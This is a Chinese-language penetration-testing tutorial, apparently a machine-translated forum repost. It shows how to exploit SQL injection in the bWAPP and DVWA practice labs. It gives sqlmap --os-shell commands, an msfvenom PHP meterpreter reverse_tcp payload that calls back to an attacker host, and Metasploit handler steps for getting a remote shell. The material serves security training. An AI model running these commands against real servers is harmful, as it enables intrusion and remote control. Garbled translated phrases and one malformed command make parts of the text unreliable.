渗透测试教程:使用Sql注入在Web服务器上进行shell上传

您多次使用sqlmap进行sql注入以获取Web服务器的数据库。在本教程中,我将向您展示如果网站遇到sql漏洞,如何上传任何后门程序。
需求:
Xampp / Wamp服务器
bWAPP实验室
Kali Linux:Burpsuite,sqlmap工具
首先,您需要在XAMPP或WAMP服务器中安装bWAPP实验室,请阅读此处的完整文章
让我们开始!!!
在Xampp或Wamp服务器中启动  Apache  和  Mysql服务。让我们在浏览器中打开本地主机地址,因为我正在使用192.168.1.101:81/bWAPP/login.php。分别输入用户和密码为bee和bug。
将安全级别设置为,从列表框中选择您的错误选择SQL-Injection(GET / SEARCH)  ,然后单击hack。
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
在文本字段中键入任何电影名称,例如thor,然后在kali Linux中启动burp套件。
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
要捕获bWAPP的cookie,请单击  代理  标记,然后单击以  启用按钮,返回到bWAPP,然后单击搜索。Burp诉讼将在获取的数据下提供cookie和referrer,稍后将在sqlmap命令中使用。
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
现在输入以下命令来运行sqlmap以访问Web服务器的os-shell。
[td=1,1,778.182]
sqlmap -u "http://192.168.0.102/bWAPP/sqli_1.php?title=thor&action=search" --cookie="PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D bwapp --os-shell


渗透测试教程:使用Sql注入在Web服务器上进行shell上传
以上命令将尝试生成后门; 我想在目标pc中发送PHP后门,因此键入4作为PHP有效负载,然后键入1作为公共位置以用作可写目录来上载它。
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
目前它正在尝试使用不同的sql注入技术在“C:/ xampp / htdocs /”上传文件。文件上传后立即; 它将发送INFO文件stager已成功上传到“C:/ xampp / htdocs /”,你将获得受害者pc的os-shell。但是在这里它还显示了您可以手动上传后门的路径,查看突出显示的URL:
http://192.168.0.102:80/tmpuuddt.php
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
我对meterpreter shell更感兴趣,所以让我们准备你用msfvenom上传的恶意文件:



[td=1,1,778.182]
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw


将代码从<?php复制到die()并将其保存在扩展名为.php的文件中。我已将后门保存为桌面上的shell.php,稍后将浏览此文件以在Web服务器上上传。
现在通过键入msfconsole加载metasploit框架  并启动  multi / handler
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
在浏览器上浏览URL http //192.168.0.102/tmpuuddt.php。从屏幕截图中,您可以阅读网页sqlmap文件上传器的标题,它可以让您在Web服务器上浏览后门,并稍后将该后门上传到Web服务器的后续目录(“C:/ xampp / htdocs /”)。

单击“ 浏览”以选择shell.php文件,然后单击“上载”

大!!! 我们的后门shell.php文件已上传。

要在目标pc上执行后门,请在浏览器上运行URL:192.168.0.102/shell.php,您将收到与multi / handler的反向连接。

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo
可爱!!! 我在我的kali Linux上有我的计时器会话。



Shell在DVWA上传

首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名  - admin
密码  - 密码
单击  DVWA Security  并将网站安全级别设置为  
从漏洞列表中选择SQL Injection进行攻击。 在文本框中键入  userID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。  
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
打开burp套件点击菜单栏中的代理( proxy,  然后  按下按钮。回来并点击dvwa中的提交按钮。“拦截”按钮用于显示在浏览器和Web服务器之间传递的HTTP和Web套接字消息。Burp诉讼将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
在下面的Sqlmap中将分析用于从目标进行连接的url,然后对给定的cookie使用sql查询来获取数据库的所有名称。


[td=1,1,778.182]
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0" --dbs
渗透测试教程:使用Sql注入在Web服务器上进行shell上传


因此,如果您注意到下面给出的图像,那么数据库的所有名称都是哑的。选择dvwa上传php后门。


现在输入以下命令来运行sqlmap来访问Web服务器的os-

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D dvwa os-shell


它会试图产生一个后门; 我想创建目标PC PHP后门因此  type 4 为  PHP  有效载荷,然后  键入4蛮力搜索中使用的可写目录上传。

它试图通过使用不同的sql注入技术在“/ xampp / htdocs /”上传文件。文件上传后立即; 它将发送INFO文件stager已成功上传到“/ xampp / htdocs /”,你将获得受害者pc的os-shell。除此之外,它还显示了路径
您可以手动上传后门,查看突出显示的网址:
http://192.168.0.102:80/tmpunias.php

浏览网址  浏览器上的http://192.168.0.102/tmpunais.php。从屏幕截图中,您可以阅读网页sqlmap文件上传器的标题,   它可以让您在Web服务器(dvwa)上浏览后门,并稍后将该后门上传到Web服务器的后续目录(“/ xampp / htdocs /”)。

让我们准备你用msfvenom上传的恶意文件:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

将代码从<?php复制到die()并将其保存在扩展名为.php的文件中。我已将后门保存为桌面上的shell.php,稍后将浏览此文件以在Web服务器上上传。
现在通过键入msfconsole加载metasploit框架   并启动  multi / handler

单击“  浏览”(browse以选择  shell.php  文件,然后单击“上传

大!!! 这里显示管理文件已上传,这意味着后门  shell.php已上传

要在目标pc上执行后门,请在浏览器上运行URL:192.168.0.102/shell.php,您将收到与multi / handler的反向连接。

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo
神州! meterpreter会话已打开。
渗透测试教程:使用Sql注入在Web服务器上进行shell上传
转载请注明本文链接: http://www.mayidui.net/t2333.html
游客
登录后才可以回帖,登录 或者 注册